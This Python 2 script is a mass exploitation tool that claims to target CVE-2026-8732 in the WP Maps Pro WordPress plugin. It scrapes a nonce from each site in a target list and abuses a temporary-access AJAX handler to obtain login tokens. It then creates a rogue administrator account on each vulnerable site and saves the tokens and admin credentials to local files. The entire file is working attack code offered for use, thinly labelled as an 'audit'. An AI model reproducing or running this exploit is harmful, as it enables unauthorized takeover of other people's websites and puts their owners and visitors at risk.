# -*- coding: utf-8 -*-
import sys
import re
import threading
import json
import time
from Queue import Queue
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
TIMEOUT = 10
TOTAL_THREAD = 10
OUTPUT_FILE = "res.txt"
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "audit@example.com"
print_lock = threading.Lock()
file_lock = threading.Lock()
HEADERS = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
}
def get_nonce(url):
try:
session = requests.Session()
session.headers.update(HEADERS)
resp = session.get(url, timeout=TIMEOUT, verify=False)
html = resp.text
match = re.search(r'wpgmp_local.*?"nonce":"([^"]+)"', html, re.DOTALL)
if match:
return match.group(1)
match = re.search(r'fc-call-nonce["\']?\s*:\s*["\']([^"\']+)', html)
if match:
return match.group(1)
return None
except Exception:
return None
def simpan_hasil(url, token, redirect_url=None):
with file_lock:
try:
with open(OUTPUT_FILE, 'a') as f:
f.write("domain : %s\n" % url)
f.write("token full : %s\n" % token)
if redirect_url:
f.write("redirect url : %s\n" % redirect_url)
f.write("\n")
except IOError as e:
with print_lock:
print "[-] Failed to write to output file: %s" % str(e)
def simpan_admin(url, username, password, email):
with file_lock:
try:
with open(ADMIN_FILE, 'a') as f:
f.write("=== Admin Created ===\n")
f.write("Domain: %s/wp-admin/\n" % url)
f.write("Username: %s\n" % username)
f.write("Password: %s\n" % password)
f.write("Email: %s\n" % email)
f.write("-------------------------------\n\n")
except IOError as e:
with print_lock:
print "[-] Failed to save admin info: %s" % str(e)
def extract_token_and_url(response_text):
try:
data = json.loads(response_text)
if 'url' in data:
full_url = data['url']
match = re.search(r'[?&]wpmp_token=([^&]+)', full_url)
if match:
return match.group(1), full_url
match = re.search(r'token=([^&]+)', full_url)
if match:
return match.group(1), full_url
if 'token' in data:
return data['token'], None
if 'access_token' in data:
return data['access_token'], None
except:
pass
match = re.search(r'wpmp_token=([a-f0-9]+)', response_text)
if match:
token = match.group(1)
url_match = re.search(r'(https?://[^\s"\']+wp-admin[^\s"\']*)', response_text)
if url_match:
return token, url_match.group(1)
return token, None
match = re.search(r'["\']token["\']\s*:\s*["\']([^"\']+)', response_text)
if match:
return match.group(1), None
match = re.search(r'["\']access_token["\']\s*:\s*["\']([^"\']+)', response_text)
if match:
return match.group(1), None
if re.match(r'^[a-f0-9]{32,}$', response_text.strip()):
return response_text.strip(), None
return None, None
def create_admin_user(session, base_url, username, password, email):
try:
admin_url = base_url.rstrip('/') + '/wp-admin/user-new.php'
headers = HEADERS.copy()
headers['Referer'] = base_url + '/wp-admin/'
resp = session.get(admin_url, headers=headers, timeout=TIMEOUT, verify=False)
if resp.status_code != 200:
return False, "Cannot access user-new.php (status %d)" % resp.status_code
html = resp.text
nonce_match = re.search(r'name="_wpnonce_create-user" value="([^"]+)"', html)
if not nonce_match:
nonce_match = re.search(r'id="_wpnonce_create-user"[^>]+value="([^"]+)"', html)
if not nonce_match:
return False, "Cannot find create-user nonce"
create_nonce = nonce_match.group(1)
submit_match = re.search(r']*type="submit"[^>]*name="createuser"[^>]*value="([^"]+)"', html)
submit_value = "Add New User"
if submit_match:
submit_value = submit_match.group(1)
data = {
'action': 'createuser',
'_wpnonce_create-user': create_nonce,
'_wp_http_referer': '/wp-admin/user-new.php',
'user_login': username,
'email': email,
'first_name': '',
'last_name': '',
'url': '',
'pass1': password,
'pass2': password,
'role': 'administrator',
'createuser': submit_value
}
post_headers = headers.copy()
post_headers['Content-Type'] = 'application/x-www-form-urlencoded'
post_resp = session.post(admin_url, data=data, headers=post_headers, timeout=TIMEOUT, verify=False, allow_redirects=False)
if post_resp.status_code == 302:
location = post_resp.headers.get('Location', '')
if 'users.php' in location:
return True, "Admin created (redirect)"
check_resp = session.get(base_url + '/wp-admin/users.php', timeout=TIMEOUT, verify=False)
if check_resp.status_code == 200 and username in check_resp.text:
return True, "Admin created (user appears in users list)"
return False, "No redirect and user not found"
except Exception as e:
return False, "Exception: %s" % str(e)
def check_vulnerability(url):
url = url.strip()
if not url:
return
if not url.startswith('http://') and not url.startswith('https://'):
url = 'https://' + url
url = url.rstrip('/')
with print_lock:
print "[*] Checking: %s" % url
nonce = get_nonce(url)
if not nonce:
with print_lock:
print "[-] %s -> Failed to get nonce" % url
return
ajax_url = url + "/wp-admin/admin-ajax.php"
payload = {
'action': 'wpgmp_temp_access_ajax',
'nonce': nonce,
'handler': 'wpgmp_temp_access_support',
'check_temp': 'false'
}
post_headers = HEADERS.copy()
post_headers.update({
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': url,
'Referer': url + '/',
'X-Requested-With': 'XMLHttpRequest'
})
try:
session = requests.Session()
session.headers.update(post_headers)
resp = session.post(ajax_url, data=payload, timeout=TIMEOUT, verify=False)
response_text = resp.text
token, redirect_url = extract_token_and_url(response_text)
if token:
with print_lock:
print "[VULNERABLE] %s -> Token found" % url
simpan_hasil(url, token, redirect_url)
if redirect_url:
with print_lock:
print "[*] %s -> Accessing redirect URL..." % url
try:
session.get(redirect_url, timeout=TIMEOUT, verify=False)
except:
pass
unique_username = "%s_%d" % (BASE_USERNAME, int(time.time()))
success, message = create_admin_user(session, url, unique_username, NEW_PASSWORD, NEW_EMAIL)
if success:
with print_lock:
print "[+] %s -> Admin created: %s / %s" % (url, unique_username, NEW_PASSWORD)
simpan_admin(url, unique_username, NEW_PASSWORD, NEW_EMAIL)
else:
with print_lock:
print "[-] %s -> Failed to create admin: %s" % (url, message)
else:
with print_lock:
print "[-] %s -> No token" % url
except Exception as e:
with print_lock:
print "[-] %s -> Error: %s" % (url, str(e))
def worker(q):
while not q.empty():
target = q.get()
try:
check_vulnerability(target)
except Exception:
pass
finally:
q.task_done()
def main():
banner = """
============================================
WP Maps Pro Vulnerability Scanner & Auto Admin
CVE-2026-8732
===========================================
"""
print banner
if len(sys.argv) < 2:
print "Usage: python mass_audit.py [target_list.txt]"
sys.exit(1)
target_file = sys.argv[1]
try:
with open(target_file, 'r') as f:
targets = [line.strip() for line in f if line.strip()]
except IOError:
print "[-] File %s not found!" % target_file
sys.exit(1)
print "[*] Starting scan on %d targets using %d threads..." % (len(targets), TOTAL_THREAD)
print "[*] Valid results saved to: %s" % OUTPUT_FILE
print "[*] Admin credentials saved to: %s" % ADMIN_FILE
print "[*] New admin username: %s_, password: %s\n" % (BASE_USERNAME, NEW_PASSWORD)
q = Queue()
for target in targets:
q.put(target)
threads = []
for i in range(TOTAL_THREAD):
t = threading.Thread(target=worker, args=(q,))
t.daemon = True
t.start()
threads.append(t)
q.join()
print "\n[*] Scan finished. Check %s and %s" % (OUTPUT_FILE, ADMIN_FILE)
if __name__ == "__main__":
main()